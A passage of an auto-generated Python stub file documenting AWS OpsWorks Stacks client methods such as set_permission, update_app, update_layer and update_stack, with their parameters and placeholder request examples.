LoadThreshold (float) --The load threshold. A value of -1 disables the threshold. For more information about how load is computed, see Load (computing) .
Alarms (list) --Custom Cloudwatch auto scaling alarms, to be used as thresholds. This parameter takes a list of up to five alarm names, which are case sensitive and must be in the same region as the stack.
Note
To use custom alarms, you must update your service role to allow cloudwatch:DescribeAlarms . You can either have AWS OpsWorks Stacks update the role for you when you first use this feature or you can edit the role manually. For more information, see Allowing AWS OpsWorks Stacks to Act on Your Behalf .
(string) --
:type DownScaling: dict
:param DownScaling: An AutoScalingThresholds object with the downscaling threshold configuration. If the load falls below these thresholds for a specified amount of time, AWS OpsWorks Stacks stops a specified number of instances.
InstanceCount (integer) --The number of instances to add or remove when the load exceeds a threshold.
ThresholdsWaitTime (integer) --The amount of time, in minutes, that the load must exceed a threshold before more instances are added or removed.
IgnoreMetricsTime (integer) --The amount of time (in minutes) after a scaling event occurs that AWS OpsWorks Stacks should ignore metrics and suppress additional scaling events. For example, AWS OpsWorks Stacks adds new instances following an upscaling event but the instances won't start reducing the load until they have been booted and configured. There is no point in raising additional scaling events during that operation, which typically takes several minutes. IgnoreMetricsTime allows you to direct AWS OpsWorks Stacks to suppress scaling events long enough to get the new instances online.
CpuThreshold (float) --The CPU utilization threshold, as a percent of the available CPU. A value of -1 disables the threshold.
MemoryThreshold (float) --The memory utilization threshold, as a percent of the available memory. A value of -1 disables the threshold.
LoadThreshold (float) --The load threshold. A value of -1 disables the threshold. For more information about how load is computed, see Load (computing) .
Alarms (list) --Custom Cloudwatch auto scaling alarms, to be used as thresholds. This parameter takes a list of up to five alarm names, which are case sensitive and must be in the same region as the stack.
Note
To use custom alarms, you must update your service role to allow cloudwatch:DescribeAlarms . You can either have AWS OpsWorks Stacks update the role for you when you first use this feature or you can edit the role manually. For more information, see Allowing AWS OpsWorks Stacks to Act on Your Behalf .
(string) --
"""
pass
def set_permission(StackId=None, IamUserArn=None, AllowSsh=None, AllowSudo=None, Level=None):
"""
Specifies a user's permissions. For more information, see Security and Permissions .
See also: AWS API Documentation
:example: response = client.set_permission(
StackId='string',
IamUserArn='string',
AllowSsh=True|False,
AllowSudo=True|False,
Level='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:type IamUserArn: string
:param IamUserArn: [REQUIRED]
The user's IAM ARN. This can also be a federated user's ARN.
:type AllowSsh: boolean
:param AllowSsh: The user is allowed to use SSH to communicate with the instance.
:type AllowSudo: boolean
:param AllowSudo: The user is allowed to use sudo to elevate privileges.
:type Level: string
:param Level: The user's permission level, which must be set to one of the following strings. You cannot set your own permissions level.
deny
show
deploy
manage
iam_only
For more information on the permissions associated with these levels, see Managing User Permissions .
"""
pass
def set_time_based_auto_scaling(InstanceId=None, AutoScalingSchedule=None):
"""
Specify the time-based auto scaling configuration for a specified instance. For more information, see Managing Load with Time-based and Load-based Instances .
See also: AWS API Documentation
:example: response = client.set_time_based_auto_scaling(
InstanceId='string',
AutoScalingSchedule={
'Monday': {
'string': 'string'
},
'Tuesday': {
'string': 'string'
},
'Wednesday': {
'string': 'string'
},
'Thursday': {
'string': 'string'
},
'Friday': {
'string': 'string'
},
'Saturday': {
'string': 'string'
},
'Sunday': {
'string': 'string'
}
}
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
:type AutoScalingSchedule: dict
:param AutoScalingSchedule: An AutoScalingSchedule with the instance schedule.
Monday (dict) --The schedule for Monday.
(string) --
(string) --
Tuesday (dict) --The schedule for Tuesday.
(string) --
(string) --
Wednesday (dict) --The schedule for Wednesday.
(string) --
(string) --
Thursday (dict) --The schedule for Thursday.
(string) --
(string) --
Friday (dict) --The schedule for Friday.
(string) --
(string) --
Saturday (dict) --The schedule for Saturday.
(string) --
(string) --
Sunday (dict) --The schedule for Sunday.
(string) --
(string) --
"""
pass
def start_instance(InstanceId=None):
"""
Starts a specified instance. For more information, see Starting, Stopping, and Rebooting Instances .
See also: AWS API Documentation
:example: response = client.start_instance(
InstanceId='string'
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
"""
pass
def start_stack(StackId=None):
"""
Starts a stack's instances.
See also: AWS API Documentation
:example: response = client.start_stack(
StackId='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
"""
pass
def stop_instance(InstanceId=None):
"""
Stops a specified instance. When you stop a standard instance, the data disappears and must be reinstalled when you restart the instance. You can stop an Amazon EBS-backed instance without losing data. For more information, see Starting, Stopping, and Rebooting Instances .
See also: AWS API Documentation
:example: response = client.stop_instance(
InstanceId='string'
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
"""
pass
def stop_stack(StackId=None):
"""
Stops a specified stack.
See also: AWS API Documentation
:example: response = client.stop_stack(
StackId='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
"""
pass
def unassign_instance(InstanceId=None):
"""
Unassigns a registered instance from all of it's layers. The instance remains in the stack as an unassigned instance and can be assigned to another layer, as needed. You cannot use this action with instances that were created with AWS OpsWorks Stacks.
See also: AWS API Documentation
:example: response = client.unassign_instance(
InstanceId='string'
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
"""
pass
def unassign_volume(VolumeId=None):
"""
Unassigns an assigned Amazon EBS volume. The volume remains registered with the stack. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.unassign_volume(
VolumeId='string'
)
:type VolumeId: string
:param VolumeId: [REQUIRED]
The volume ID.
"""
pass
def update_app(AppId=None, Name=None, Description=None, DataSources=None, Type=None, AppSource=None, Domains=None, EnableSsl=None, SslConfiguration=None, Attributes=None, Environment=None):
"""
Updates a specified app.
See also: AWS API Documentation
:example: response = client.update_app(
AppId='string',
Name='string',
Description='string',
DataSources=[
{
'Type': 'string',
'Arn': 'string',
'DatabaseName': 'string'
},
],
Type='aws-flow-ruby'|'java'|'rails'|'php'|'nodejs'|'static'|'other',
AppSource={
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
Domains=[
'string',
],
EnableSsl=True|False,
SslConfiguration={
'Certificate': 'string',
'PrivateKey': 'string',
'Chain': 'string'
},
Attributes={
'string': 'string'
},
Environment=[
{
'Key': 'string',
'Value': 'string',
'Secure': True|False
},
]
)
:type AppId: string
:param AppId: [REQUIRED]
The app ID.
:type Name: string
:param Name: The app name.
:type Description: string
:param Description: A description of the app.
:type DataSources: list
:param DataSources: The app's data sources.
(dict) --Describes an app's data source.
Type (string) --The data source's type, AutoSelectOpsworksMysqlInstance , OpsworksMysqlInstance , or RdsDbInstance .
Arn (string) --The data source's ARN.
DatabaseName (string) --The database name.
:type Type: string
:param Type: The app type.
:type AppSource: dict
:param AppSource: A Source object that specifies the app repository.
Type (string) --The repository type.
Url (string) --The source URL.
Username (string) --This parameter depends on the repository type.
For Amazon S3 bundles, set Username to the appropriate IAM access key ID.
For HTTP bundles, Git repositories, and Subversion repositories, set Username to the user name.
Password (string) --When included in a request, the parameter depends on the repository type.
For Amazon S3 bundles, set Password to the appropriate IAM secret access key.
For HTTP bundles and Subversion repositories, set Password to the password.
For more information on how to safely handle IAM credentials, see http://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html .
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
SshKey (string) --In requests, the repository's SSH key.
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
Revision (string) --The application's version. AWS OpsWorks Stacks enables you to easily deploy new versions of an application. One of the simplest approaches is to have branches or revisions in your repository that represent different versions that can potentially be deployed.
:type Domains: list
:param Domains: The app's virtual host settings, with multiple domains separated by commas. For example: 'www.example.com, example.com'
(string) --
:type EnableSsl: boolean
:param EnableSsl: Whether SSL is enabled for the app.
:type SslConfiguration: dict
:param SslConfiguration: An SslConfiguration object with the SSL configuration.
Certificate (string) -- [REQUIRED]The contents of the certificate's domain.crt file.
PrivateKey (string) -- [REQUIRED]The private key; the contents of the certificate's domain.kex file.
Chain (string) --Optional. Can be used to specify an intermediate certificate authority key or client authentication.
:type Attributes: dict
:param Attributes: One or more user-defined key/value pairs to be added to the stack attributes.
(string) --
(string) --
:type Environment: list
:param Environment: An array of EnvironmentVariable objects that specify environment variables to be associated with the app. After you deploy the app, these variables are defined on the associated app server instances.For more information, see Environment Variables .
There is no specific limit on the number of environment variables. However, the size of the associated data structure - which includes the variables' names, values, and protected flag values - cannot exceed 10 KB (10240 Bytes). This limit should accommodate most if not all use cases. Exceeding it will cause an exception with the message, 'Environment: is too large (maximum is 10KB).'
Note
This parameter is supported only by Chef 11.10 stacks. If you have specified one or more environment variables, you cannot modify the stack's Chef version.
(dict) --Represents an app's environment variable.
Key (string) -- [REQUIRED](Required) The environment variable's name, which can consist of up to 64 characters and must be specified. The name can contain upper- and lowercase letters, numbers, and underscores (_), but it must start with a letter or underscore.
Value (string) -- [REQUIRED](Optional) The environment variable's value, which can be left empty. If you specify a value, it can contain up to 256 characters, which must all be printable.
Secure (boolean) --(Optional) Whether the variable's value will be returned by the DescribeApps action. To conceal an environment variable's value, set Secure to true . DescribeApps then returns *****FILTERED***** instead of the actual value. The default value for Secure is false .
"""
pass
def update_elastic_ip(ElasticIp=None, Name=None):
"""
Updates a registered Elastic IP address's name. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.update_elastic_ip(
ElasticIp='string',
Name='string'
)
:type ElasticIp: string
:param ElasticIp: [REQUIRED]
The address.
:type Name: string
:param Name: The new name.
"""
pass
def update_instance(InstanceId=None, LayerIds=None, InstanceType=None, AutoScalingType=None, Hostname=None, Os=None, AmiId=None, SshKeyName=None, Architecture=None, InstallUpdatesOnBoot=None, EbsOptimized=None, AgentVersion=None):
"""
Updates a specified instance.
See also: AWS API Documentation
:example: response = client.update_instance(
InstanceId='string',
LayerIds=[
'string',
],
InstanceType='string',
AutoScalingType='load'|'timer',
Hostname='string',
Os='string',
AmiId='string',
SshKeyName='string',
Architecture='x86_64'|'i386',
InstallUpdatesOnBoot=True|False,
EbsOptimized=True|False,
AgentVersion='string'
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
:type LayerIds: list
:param LayerIds: The instance's layer IDs.
(string) --
:type InstanceType: string
:param InstanceType: The instance type, such as t2.micro . For a list of supported instance types, open the stack in the console, choose Instances , and choose + Instance . The Size list contains the currently supported types. For more information, see Instance Families and Types . The parameter values that you use to specify the various types are in the API Name column of the Available Instance Types table.
:type AutoScalingType: string
:param AutoScalingType: For load-based or time-based instances, the type. Windows stacks can use only time-based instances.
:type Hostname: string
:param Hostname: The instance host name.
:type Os: string
:param Os: The instance's operating system, which must be set to one of the following. You cannot update an instance that is using a custom AMI.
A supported Linux operating system: An Amazon Linux version, such as Amazon Linux 2016.09 , Amazon Linux 2016.03 , Amazon Linux 2015.09 , or Amazon Linux 2015.03 .
A supported Ubuntu operating system, such as Ubuntu 16.04 LTS , Ubuntu 14.04 LTS , or Ubuntu 12.04 LTS .
CentOS Linux 7
Red Hat Enterprise Linux 7
A supported Windows operating system, such as Microsoft Windows Server 2012 R2 Base , Microsoft Windows Server 2012 R2 with SQL Server Express , Microsoft Windows Server 2012 R2 with SQL Server Standard , or Microsoft Windows Server 2012 R2 with SQL Server Web .
For more information on the supported operating systems, see AWS OpsWorks Stacks Operating Systems .
The default option is the current Amazon Linux version. If you set this parameter to Custom , you must use the AmiId parameter to specify the custom AMI that you want to use. For more information on the supported operating systems, see Operating Systems . For more information on how to use custom AMIs with OpsWorks, see Using Custom AMIs .
Note
You can specify a different Linux operating system for the updated stack, but you cannot change from Linux to Windows or Windows to Linux.
:type AmiId: string
:param AmiId: The ID of the AMI that was used to create the instance. The value of this parameter must be the same AMI ID that the instance is already using. You cannot apply a new AMI to an instance by running UpdateInstance. UpdateInstance does not work on instances that are using custom AMIs.
:type SshKeyName: string
:param SshKeyName: The instance's Amazon EC2 key name.
:type Architecture: string
:param Architecture: The instance architecture. Instance types do not necessarily support both architectures. For a list of the architectures that are supported by the different instance types, see Instance Families and Types .
:type InstallUpdatesOnBoot: boolean
:param InstallUpdatesOnBoot: Whether to install operating system and package updates when the instance boots. The default value is true . To control when updates are installed, set this value to false . You must then update your instances manually by using CreateDeployment to run the update_dependencies stack command or by manually running yum (Amazon Linux) or apt-get (Ubuntu) on the instances.
Note
We strongly recommend using the default value of true , to ensure that your instances have the latest security updates.
:type EbsOptimized: boolean
:param EbsOptimized: This property cannot be updated.
:type AgentVersion: string
:param AgentVersion: The default AWS OpsWorks Stacks agent version. You have the following options:
INHERIT - Use the stack's default agent version setting.
version_number - Use the specified agent version. This value overrides the stack's default setting. To update the agent version, you must edit the instance configuration and specify a new version. AWS OpsWorks Stacks then automatically installs that version on the instance.
The default setting is INHERIT . To specify an agent version, you must use the complete version number, not the abbreviated number shown on the console. For a list of available agent version numbers, call DescribeAgentVersions .
AgentVersion cannot be set to Chef 12.2.
"""
pass
def update_layer(LayerId=None, Name=None, Shortname=None, Attributes=None, CloudWatchLogsConfiguration=None, CustomInstanceProfileArn=None, CustomJson=None, CustomSecurityGroupIds=None, Packages=None, VolumeConfigurations=None, EnableAutoHealing=None, AutoAssignElasticIps=None, AutoAssignPublicIps=None, CustomRecipes=None, InstallUpdatesOnBoot=None, UseEbsOptimizedInstances=None, LifecycleEventConfiguration=None):
"""
Updates a specified layer.
See also: AWS API Documentation
:example: response = client.update_layer(
LayerId='string',
Name='string',
Shortname='string',
Attributes={
'string': 'string'
},
CloudWatchLogsConfiguration={
'Enabled': True|False,
'LogStreams': [
{
'LogGroupName': 'string',
'DatetimeFormat': 'string',
'TimeZone': 'LOCAL'|'UTC',
'File': 'string',
'FileFingerprintLines': 'string',
'MultiLineStartPattern': 'string',
'InitialPosition': 'start_of_file'|'end_of_file',
'Encoding': 'ascii'|'big5'|'big5hkscs'|'cp037'|'cp424'|'cp437'|'cp500'|'cp720'|'cp737'|'cp775'|'cp850'|'cp852'|'cp855'|'cp856'|'cp857'|'cp858'|'cp860'|'cp861'|'cp862'|'cp863'|'cp864'|'cp865'|'cp866'|'cp869'|'cp874'|'cp875'|'cp932'|'cp949'|'cp950'|'cp1006'|'cp1026'|'cp1140'|'cp1250'|'cp1251'|'cp1252'|'cp1253'|'cp1254'|'cp1255'|'cp1256'|'cp1257'|'cp1258'|'euc_jp'|'euc_jis_2004'|'euc_jisx0213'|'euc_kr'|'gb2312'|'gbk'|'gb18030'|'hz'|'iso2022_jp'|'iso2022_jp_1'|'iso2022_jp_2'|'iso2022_jp_2004'|'iso2022_jp_3'|'iso2022_jp_ext'|'iso2022_kr'|'latin_1'|'iso8859_2'|'iso8859_3'|'iso8859_4'|'iso8859_5'|'iso8859_6'|'iso8859_7'|'iso8859_8'|'iso8859_9'|'iso8859_10'|'iso8859_13'|'iso8859_14'|'iso8859_15'|'iso8859_16'|'johab'|'koi8_r'|'koi8_u'|'mac_cyrillic'|'mac_greek'|'mac_iceland'|'mac_latin2'|'mac_roman'|'mac_turkish'|'ptcp154'|'shift_jis'|'shift_jis_2004'|'shift_jisx0213'|'utf_32'|'utf_32_be'|'utf_32_le'|'utf_16'|'utf_16_be'|'utf_16_le'|'utf_7'|'utf_8'|'utf_8_sig',
'BufferDuration': 123,
'BatchCount': 123,
'BatchSize': 123
},
]
},
CustomInstanceProfileArn='string',
CustomJson='string',
CustomSecurityGroupIds=[
'string',
],
Packages=[
'string',
],
VolumeConfigurations=[
{
'MountPoint': 'string',
'RaidLevel': 123,
'NumberOfDisks': 123,
'Size': 123,
'VolumeType': 'string',
'Iops': 123
},
],
EnableAutoHealing=True|False,
AutoAssignElasticIps=True|False,
AutoAssignPublicIps=True|False,
CustomRecipes={
'Setup': [
'string',
],
'Configure': [
'string',
],
'Deploy': [
'string',
],
'Undeploy': [
'string',
],
'Shutdown': [
'string',
]
},
InstallUpdatesOnBoot=True|False,
UseEbsOptimizedInstances=True|False,
LifecycleEventConfiguration={
'Shutdown': {
'ExecutionTimeout': 123,
'DelayUntilElbConnectionsDrained': True|False
}
}
)
:type LayerId: string
:param LayerId: [REQUIRED]
The layer ID.
:type Name: string
:param Name: The layer name, which is used by the console.
:type Shortname: string
:param Shortname: For custom layers only, use this parameter to specify the layer's short name, which is used internally by AWS OpsWorks Stacks and by Chef. The short name is also used as the name for the directory where your app files are installed. It can have a maximum of 200 characters and must be in the following format: /A[a-z0-9-_.]+Z/.
The built-in layers' short names are defined by AWS OpsWorks Stacks. For more information, see the Layer Reference
:type Attributes: dict
:param Attributes: One or more user-defined key/value pairs to be added to the stack attributes.
(string) --
(string) --
:type CloudWatchLogsConfiguration: dict
:param CloudWatchLogsConfiguration: Specifies CloudWatch Logs configuration options for the layer. For more information, see CloudWatchLogsLogStream .
Enabled (boolean) --Whether CloudWatch Logs is enabled for a layer.
LogStreams (list) --A list of configuration options for CloudWatch Logs.
(dict) --Describes the Amazon CloudWatch logs configuration for a layer. For detailed information about members of this data type, see the CloudWatch Logs Agent Reference .
LogGroupName (string) --Specifies the destination log group. A log group is created automatically if it doesn't already exist. Log group names can be between 1 and 512 characters long. Allowed characters include a-z, A-Z, 0-9, '_' (underscore), '-' (hyphen), '/' (forward slash), and '.' (period).
DatetimeFormat (string) --Specifies how the time stamp is extracted from logs. For more information, see the CloudWatch Logs Agent Reference .
TimeZone (string) --Specifies the time zone of log event time stamps.
File (string) --Specifies log files that you want to push to CloudWatch Logs.
File can point to a specific file or multiple files (by using wild card characters such as /var/log/system.log* ). Only the latest file is pushed to CloudWatch Logs, based on file modification time. We recommend that you use wild card characters to specify a series of files of the same type, such as access_log.2014-06-01-01 , access_log.2014-06-01-02 , and so on by using a pattern like access_log.* . Don't use a wildcard to match multiple file types, such as access_log_80 and access_log_443 . To specify multiple, different file types, add another log stream entry to the configuration file, so that each log file type is stored in a different log group.
Zipped files are not supported.
FileFingerprintLines (string) --Specifies the range of lines for identifying a file. The valid values are one number, or two dash-delimited numbers, such as '1', '2-5'. The default value is '1', meaning the first line is used to calculate the fingerprint. Fingerprint lines are not sent to CloudWatch Logs unless all specified lines are available.
MultiLineStartPattern (string) --Specifies the pattern for identifying the start of a log message.
InitialPosition (string) --Specifies where to start to read data (start_of_file or end_of_file). The default is start_of_file. This setting is only used if there is no state persisted for that log stream.
Encoding (string) --Specifies the encoding of the log file so that the file can be read correctly. The default is utf_8 . Encodings supported by Python codecs.decode() can be used here.
BufferDuration (integer) --Specifies the time duration for the batching of log events. The minimum value is 5000ms and default value is 5000ms.
BatchCount (integer) --Specifies the max number of log events in a batch, up to 10000. The default value is 1000.
BatchSize (integer) --Specifies the maximum size of log events in a batch, in bytes, up to 1048576 bytes. The default value is 32768 bytes. This size is calculated as the sum of all event messages in UTF-8, plus 26 bytes for each log event.
:type CustomInstanceProfileArn: string
:param CustomInstanceProfileArn: The ARN of an IAM profile to be used for all of the layer's EC2 instances. For more information about IAM ARNs, see Using Identifiers .
:type CustomJson: string
:param CustomJson: A JSON-formatted string containing custom stack configuration and deployment attributes to be installed on the layer's instances. For more information, see Using Custom JSON .
:type CustomSecurityGroupIds: list
:param CustomSecurityGroupIds: An array containing the layer's custom security group IDs.
(string) --
:type Packages: list
:param Packages: An array of Package objects that describe the layer's packages.
(string) --
:type VolumeConfigurations: list
:param VolumeConfigurations: A VolumeConfigurations object that describes the layer's Amazon EBS volumes.
(dict) --Describes an Amazon EBS volume configuration.
MountPoint (string) -- [REQUIRED]The volume mount point. For example '/dev/sdh'.
RaidLevel (integer) --The volume RAID level .
NumberOfDisks (integer) -- [REQUIRED]The number of disks in the volume.
Size (integer) -- [REQUIRED]The volume size.
VolumeType (string) --The volume type:
standard - Magnetic
io1 - Provisioned IOPS (SSD)
gp2 - General Purpose (SSD)
Iops (integer) --For PIOPS volumes, the IOPS per disk.
:type EnableAutoHealing: boolean
:param EnableAutoHealing: Whether to disable auto healing for the layer.
:type AutoAssignElasticIps: boolean
:param AutoAssignElasticIps: Whether to automatically assign an Elastic IP address to the layer's instances. For more information, see How to Edit a Layer .
:type AutoAssignPublicIps: boolean
:param AutoAssignPublicIps: For stacks that are running in a VPC, whether to automatically assign a public IP address to the layer's instances. For more information, see How to Edit a Layer .
:type CustomRecipes: dict
:param CustomRecipes: A LayerCustomRecipes object that specifies the layer's custom recipes.
Setup (list) --An array of custom recipe names to be run following a setup event.
(string) --
Configure (list) --An array of custom recipe names to be run following a configure event.
(string) --
Deploy (list) --An array of custom recipe names to be run following a deploy event.
(string) --
Undeploy (list) --An array of custom recipe names to be run following a undeploy event.
(string) --
Shutdown (list) --An array of custom recipe names to be run following a shutdown event.
(string) --
:type InstallUpdatesOnBoot: boolean
:param InstallUpdatesOnBoot: Whether to install operating system and package updates when the instance boots. The default value is true . To control when updates are installed, set this value to false . You must then update your instances manually by using CreateDeployment to run the update_dependencies stack command or manually running yum (Amazon Linux) or apt-get (Ubuntu) on the instances.
Note
We strongly recommend using the default value of true , to ensure that your instances have the latest security updates.
:type UseEbsOptimizedInstances: boolean
:param UseEbsOptimizedInstances: Whether to use Amazon EBS-optimized instances.
:type LifecycleEventConfiguration: dict
:param LifecycleEventConfiguration:
Shutdown (dict) --A ShutdownEventConfiguration object that specifies the Shutdown event configuration.
ExecutionTimeout (integer) --The time, in seconds, that AWS OpsWorks Stacks will wait after triggering a Shutdown event before shutting down an instance.
DelayUntilElbConnectionsDrained (boolean) --Whether to enable Elastic Load Balancing connection draining. For more information, see Connection Draining
"""
pass
def update_my_user_profile(SshPublicKey=None):
"""
Updates a user's SSH public key.
See also: AWS API Documentation
:example: response = client.update_my_user_profile(
SshPublicKey='string'
)
:type SshPublicKey: string
:param SshPublicKey: The user's SSH public key.
"""
pass
def update_rds_db_instance(RdsDbInstanceArn=None, DbUser=None, DbPassword=None):
"""
Updates an Amazon RDS instance.
See also: AWS API Documentation
:example: response = client.update_rds_db_instance(
RdsDbInstanceArn='string',
DbUser='string',
DbPassword='string'
)
:type RdsDbInstanceArn: string
:param RdsDbInstanceArn: [REQUIRED]
The Amazon RDS instance's ARN.
:type DbUser: string
:param DbUser: The master user name.
:type DbPassword: string
:param DbPassword: The database password.
"""
pass
def update_stack(StackId=None, Name=None, Attributes=None, ServiceRoleArn=None, DefaultInstanceProfileArn=None, DefaultOs=None, HostnameTheme=None, DefaultAvailabilityZone=None, DefaultSubnetId=None, CustomJson=None, ConfigurationManager=None, ChefConfiguration=None, UseCustomCookbooks=None, CustomCookbooksSource=None, DefaultSshKeyName=None, DefaultRootDeviceType=None, UseOpsworksSecurityGroups=None, AgentVersion=None):
"""
Updates a specified stack.
See also: AWS API Documentation
:example: response = client.update_stack(
StackId='string',
Name='string',
Attributes={
'string': 'string'
},
ServiceRoleArn='string',
DefaultInstanceProfileArn='string',
DefaultOs='string',
HostnameTheme='string',
DefaultAvailabilityZone='string',
DefaultSubnetId='string',
CustomJson='string',
ConfigurationManager={
'Name': 'string',
'Version': 'string'
},
ChefConfiguration={
'ManageBerkshelf': True|False,
'BerkshelfVersion': 'string'
},
UseCustomCookbooks=True|False,
CustomCookbooksSource={
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
DefaultSshKeyName='string',
DefaultRootDeviceType='ebs'|'instance-store',
UseOpsworksSecurityGroups=True|False,
AgentVersion='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:type Name: string
:param Name: The stack's new name.
:type Attributes: dict
:param Attributes: One or more user-defined key-value pairs to be added to the stack attributes.
(string) --
(string) --
:type ServiceRoleArn: string
:param ServiceRoleArn: Do not use this parameter. You cannot update a stack's service role.
:type DefaultInstanceProfileArn: string
:param DefaultInstanceProfileArn: The ARN of an IAM profile that is the default profile for all of the stack's EC2 instances. For more information about IAM ARNs, see Using Identifiers .
:type DefaultOs: string
:param DefaultOs: The stack's operating system, which must be set to one of the following:
A supported Linux operating system: An Amazon Linux version, such as Amazon Linux 2016.09 , Amazon Linux 2016.03 , Amazon Linux 2015.09 , or Amazon Linux 2015.03 .
A supported Ubuntu operating system, such as Ubuntu 16.04 LTS , Ubuntu 14.04 LTS , or Ubuntu 12.04 LTS .
CentOS Linux 7
Red Hat Enterprise Linux 7
A supported Windows operating system, such as Microsoft Windows Server 2012 R2 Base , Microsoft Windows Server 2012 R2 with SQL Server Express , Microsoft Windows Server 2012 R2 with SQL Server Standard , or Microsoft Windows Server 2012 R2 with SQL Server Web .
A custom AMI: Custom . You specify the custom AMI you want to use when you create instances. For more information on how to use custom AMIs with OpsWorks, see Using Custom AMIs .
The default option is the stack's current operating system. For more information on the supported operating systems, see AWS OpsWorks Stacks Operating Systems .
:type HostnameTheme: string
:param HostnameTheme: The stack's new host name theme, with spaces replaced by underscores. The theme is used to generate host names for the stack's instances. By default, HostnameTheme is set to Layer_Dependent , which creates host names by appending integers to the layer's short name. The other themes are:
Baked_Goods
Clouds
Europe_Cities
Fruits
Greek_Deities
Legendary_creatures_from_Japan
Planets_and_Moons
Roman_Deities
Scottish_Islands
US_Cities
Wild_Cats
To obtain a generated host name, call GetHostNameSuggestion , which returns a host name based on the current theme.
:type DefaultAvailabilityZone: string
:param DefaultAvailabilityZone: The stack's default Availability Zone, which must be in the stack's region. For more information, see Regions and Endpoints . If you also specify a value for DefaultSubnetId , the subnet must be in the same zone. For more information, see CreateStack .
:type DefaultSubnetId: string
:param DefaultSubnetId: The stack's default VPC subnet ID. This parameter is required if you specify a value for the VpcId parameter. All instances are launched into this subnet unless you specify otherwise when you create the instance. If you also specify a value for DefaultAvailabilityZone , the subnet must be in that zone. For information on default values and when this parameter is required, see the VpcId parameter description.
:type CustomJson: string
:param CustomJson: A string that contains user-defined, custom JSON. It can be used to override the corresponding default stack configuration JSON values or to pass data to recipes. The string should be in the following format:
'{\'key1\': \'value1\', \'key2\': \'value2\',...}'
For more information on custom JSON, see Use Custom JSON to Modify the Stack Configuration Attributes .
:type ConfigurationManager: dict
:param ConfigurationManager: The configuration manager. When you update a stack, we recommend that you use the configuration manager to specify the Chef version: 12, 11.10, or 11.4 for Linux stacks, or 12.2 for Windows stacks. The default value for Linux stacks is currently 11.4.
Name (string) --The name. This parameter must be set to 'Chef'.
Version (string) --The Chef version. This parameter must be set to 12, 11.10, or 11.4 for Linux stacks, and to 12.2 for Windows stacks. The default value for Linux stacks is 11.4.
:type ChefConfiguration: dict
:param ChefConfiguration: A ChefConfiguration object that specifies whether to enable Berkshelf and the Berkshelf version on Chef 11.10 stacks. For more information, see Create a New Stack .
ManageBerkshelf (boolean) --Whether to enable Berkshelf.
BerkshelfVersion (string) --The Berkshelf version.
:type UseCustomCookbooks: boolean
:param UseCustomCookbooks: Whether the stack uses custom cookbooks.
:type CustomCookbooksSource: dict
:param CustomCookbooksSource: Contains the information required to retrieve an app or cookbook from a repository. For more information, see Creating Apps or Custom Recipes and Cookbooks .
Type (string) --The repository type.
Url (string) --The source URL.
Username (string) --This parameter depends on the repository type.
For Amazon S3 bundles, set Username to the appropriate IAM access key ID.
For HTTP bundles, Git repositories, and Subversion repositories, set Username to the user name.
Password (string) --When included in a request, the parameter depends on the repository type.
For Amazon S3 bundles, set Password to the appropriate IAM secret access key.
For HTTP bundles and Subversion repositories, set Password to the password.
For more information on how to safely handle IAM credentials, see http://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html .
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
SshKey (string) --In requests, the repository's SSH key.
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
Revision (string) --The application's version. AWS OpsWorks Stacks enables you to easily deploy new versions of an application. One of the simplest approaches is to have branches or revisions in your repository that represent different versions that can potentially be deployed.
:type DefaultSshKeyName: string
:param DefaultSshKeyName: A default Amazon EC2 key-pair name. The default value is none . If you specify a key-pair name, AWS OpsWorks Stacks installs the public key on the instance and you can use the private key with an SSH client to log in to the instance. For more information, see Using SSH to Communicate with an Instance and Managing SSH Access . You can override this setting by specifying a different key pair, or no key pair, when you create an instance .
:type DefaultRootDeviceType: string
:param DefaultRootDeviceType: The default root device type. This value is used by default for all instances in the stack, but you can override it when you create an instance. For more information, see Storage for the Root Device .
:type UseOpsworksSecurityGroups: boolean
:param UseOpsworksSecurityGroups: Whether to associate the AWS OpsWorks Stacks built-in security groups with the stack's layers.
AWS OpsWorks Stacks provides a standard set of built-in security groups, one for each layer, which are associated with layers by default. UseOpsworksSecurityGroups allows you to provide your own custom security groups instead of using the built-in groups. UseOpsworksSecurityGroups has the following settings:
True - AWS OpsWorks Stacks automatically associates the appropriate built-in security group with each layer (default setting). You can associate additional security groups with a layer after you create it, but you cannot delete the built-in security group.
False - AWS OpsWorks Stacks does not associate built-in security groups with layers. You must create appropriate EC2 security groups and associate a security group with each layer that you create. However, you can still manually associate a built-in security group with a layer on. Custom security groups are required only for those layers that need custom settings.
For more information, see Create a New Stack .
:type AgentVersion: string
:param AgentVersion: The default AWS OpsWorks Stacks agent version. You have the following options:
Auto-update - Set this parameter to LATEST . AWS OpsWorks Stacks automatically installs new agent versions on the stack's instances as soon as they are available.
Fixed version - Set this parameter to your preferred agent version. To update the agent version, you must edit the stack configuration and specify a new version. AWS OpsWorks Stacks then automatically installs that version on the stack's instances.
The default setting is LATEST . To specify an agent version, you must use the complete version number, not the abbreviated number shown on the console. For a list of available agent version numbers, call DescribeAgentVersions . AgentVersion cannot be set to Chef 12.2.
Note
You can also specify an agent version when you create or update an instance, which overrides the stack's default setting.
"""
pass
def update_user_profile(IamUserArn=None, SshUsername=None, SshPublicKey=None, AllowSelfManagement=None):
"""
Updates a specified user profile.
See also: AWS API Documentation
:example: response = client.update_user_profile(
IamUserArn='string',
SshUsername='string',
SshPublicKey='string',
